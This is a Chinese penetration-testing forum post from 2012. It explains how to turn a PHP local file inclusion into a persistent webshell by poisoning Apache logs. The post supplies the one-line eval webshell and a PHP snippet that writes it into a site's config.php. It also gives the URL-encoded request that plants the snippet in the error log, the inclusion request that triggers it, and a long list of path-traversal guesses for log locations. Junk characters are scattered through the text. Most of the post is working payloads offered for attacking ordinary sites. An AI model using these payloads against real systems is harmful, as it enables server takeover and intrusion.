找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
返回列表 发新帖
查看: 2493|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
# y# C6 W: e0 G# {6 ~5 e5 X' B0 \
比如还是这句一句话木马
1 Z7 [" }0 k$ I5 ~* a, ?. x; C<?eval($_POST[cmd]);?>   
# [% t+ ^& |2 Q+ L2 f% ~- X
" R. [6 m! ]" ~% {" Q到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 2 Z) R5 z$ w: N9 F9 b  U$ X) W
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ! {5 L& N) Y3 p0 l, H4 a- L

: h4 \  H) F/ C. }! m, [' O<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); ( Q* d/ h; }5 Z" L
fclose($fp);?>   //在config.php里写入一句木马语句 9 a- |! {  g8 a
& ^, |# p8 H5 Q+ B2 d. p  I
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 5 U0 Z# o& _7 Z# h9 v& p
转换为 ' N* E# t- m0 @1 M5 r" J8 l
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
: ]0 Z; Z4 ^1 n. Jconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
3 I( ]: u8 }; u8 H) }! |%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
. L6 T' m. x' Wfclose%28%24fp%29%3B%3F%3E " H- `5 W/ H: E9 T, s; V9 O) `5 A- n$ \
我们提交 , r6 J& E% N: g/ b0 B- \  S
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
& O. G3 A& H0 V8 l: b% f9 o+ p%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
& f: i/ ^! e6 C4 S%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B % L' P3 |6 u2 e
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
" y- m7 i1 C" y6 i0 I5 ]! N' s+ |0 [
+ f6 k0 a) O/ H7 M这样就错误日志里就记录下了这行写入webshell的代码。 & a$ `( ?/ w6 e/ u9 m3 O/ [. c
我们再来包含日志,提交
% P% c. P# n  D  ^* ]9 u  Uhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
4 d& B1 p% X$ m& S3 G; z6 L7 q( q+ \+ j/ e/ F
这样webshell就写入成功了,config.php里就写入一句木马语句
* ?- x+ `; J- s6 h/ m$ NOK. ! @0 D$ H% E# l1 u, n8 z0 @$ S
http://www.xxx.com/forum/config.php这个就成了我们的webshell
7 o5 g' L8 }, X+ P6 O6 x直接用lanker的客户端一连,主机就是你的了。
  A( G0 V  F1 {; a# A
8 G5 i* F; V" h- ^- }5 c+ [PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 . s- X0 T% f2 u$ J
4 |# }2 h7 @' F, w  x
其他的日志路径,你可以去猜,也可以参照这里。 3 L2 G0 u" _* `& H
../../../../../../../../../../var/log/httpd/access_log 3 s) [$ q, _, [$ |5 \' |: A
../../../../../../../../../../var/log/httpd/error_log 2 o2 d* j; O! ~* ]/ B( S: w1 y% [
../apache/logs/error.log
( Q6 ~, |. j- ~* Y2 x: w2 h../apache/logs/access.log
! _# G  X$ P/ n. N' t4 D& _../../apache/logs/error.log
% x/ `( o) H: t' K1 e../../apache/logs/access.log
2 ]/ L% ~# B( ]* Z2 `# w../../../apache/logs/error.log 2 g" ]4 |- f6 D. m
../../../apache/logs/access.log ! I2 q- V4 F9 E- E4 z; \
../../../../../../../../../../etc/httpd/logs/acces_log
+ x3 H- z) W9 s2 Z+ F& Y1 C../../../../../../../../../../etc/httpd/logs/acces.log : `0 W0 z1 D* }% m8 U( Y! a
../../../../../../../../../../etc/httpd/logs/error_log ( e7 F2 L1 S( m' e/ t% V- m3 ~
../../../../../../../../../../etc/httpd/logs/error.log 8 C/ j1 x: r. ?) r6 |4 y
../../../../../../../../../../var/www/logs/access_log & J7 s: n5 A% i8 i* r5 e5 Q. w2 Z
../../../../../../../../../../var/www/logs/access.log
5 V+ t6 }$ e  W; N- W+ y7 b../../../../../../../../../../usr/local/apache/logs/access_log
$ t9 W8 s3 R% F8 I../../../../../../../../../../usr/local/apache/logs/access.log . U2 |/ e2 z: o  m2 N# }
../../../../../../../../../../var/log/apache/access_log
& H% Z! G+ q& z0 L! Q9 E../../../../../../../../../../var/log/apache/access.log # T5 Y. a: J) O
../../../../../../../../../../var/log/access_log
* |9 H5 S5 R& m/ U  t7 }../../../../../../../../../../var/www/logs/error_log
5 n! e' m4 j, ^2 t$ G: }../../../../../../../../../../var/www/logs/error.log . e. d9 S9 d/ C9 @
../../../../../../../../../../usr/local/apache/logs/error_log 3 u( B. P4 Y! W4 O
../../../../../../../../../../usr/local/apache/logs/error.log $ Z. n" q* z9 \, y+ C
../../../../../../../../../../var/log/apache/error_log
. `0 |: X# O) [! x8 ]* K9 r../../../../../../../../../../var/log/apache/error.log ' b1 C8 H8 v! @
../../../../../../../../../../var/log/access_log " t* z& d9 e) q  V6 B8 M
../../../../../../../../../../var/log/error_log
- l- A( J. z& T; C4 q6 Z/var/log/httpd/access_log       $ W/ y6 ~, a; Q- U' _+ N
/var/log/httpd/error_log       Y8 T: R! V  G5 ]( U) A, V
../apache/logs/error.log     
. p4 t9 e2 n; h; ?. G1 C  ?../apache/logs/access.log 8 p, n$ p5 W9 ~1 e% q
../../apache/logs/error.log
0 j3 R1 l" i; c2 ?! L2 X../../apache/logs/access.log
* ~7 d$ x7 j% a3 {% A5 Y../../../apache/logs/error.log 1 F, I: g" N- w' `& y
../../../apache/logs/access.log " e3 T' p0 T, `- o$ Q7 K. M
/etc/httpd/logs/acces_log
6 R' q# H! N, f' z- p4 S/etc/httpd/logs/acces.log
4 e& G8 s6 M0 V9 I) c7 |3 M" Q/etc/httpd/logs/error_log - d& m1 E+ v- ?
/etc/httpd/logs/error.log
( b+ z2 ~  c+ x; I) l/var/www/logs/access_log
5 Z5 O: c* F" ?) J; _+ E9 R3 v( N/var/www/logs/access.log ( O" l+ l% o( C9 H: r+ d+ j
/usr/local/apache/logs/access_log : F  ^4 \0 R2 v/ V" L3 s' B
/usr/local/apache/logs/access.log
1 k8 v6 J( w* }/ s9 T5 X/var/log/apache/access_log " p& H& G1 R* k9 u; M- G5 v
/var/log/apache/access.log
+ B2 y' A1 k, ~& v* @$ ~3 p' s: C/var/log/access_log
5 R/ `( ]2 x0 D0 x/var/www/logs/error_log
9 X% |  v1 O, l$ G/var/www/logs/error.log % z) b) \+ I( U/ C: m5 \! y8 E3 g
/usr/local/apache/logs/error_log   z; R* Q4 T0 C  k, Y, q# X& ?
/usr/local/apache/logs/error.log
+ o! K% ]( m- o1 _) ^7 v& I/var/log/apache/error_log
# V4 H2 K. X" o3 A. d/var/log/apache/error.log ; ]) f+ h3 x/ \3 S  Z5 j9 g7 ^
/var/log/access_log 6 J0 s+ R! B& V: M) O% r( u
/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表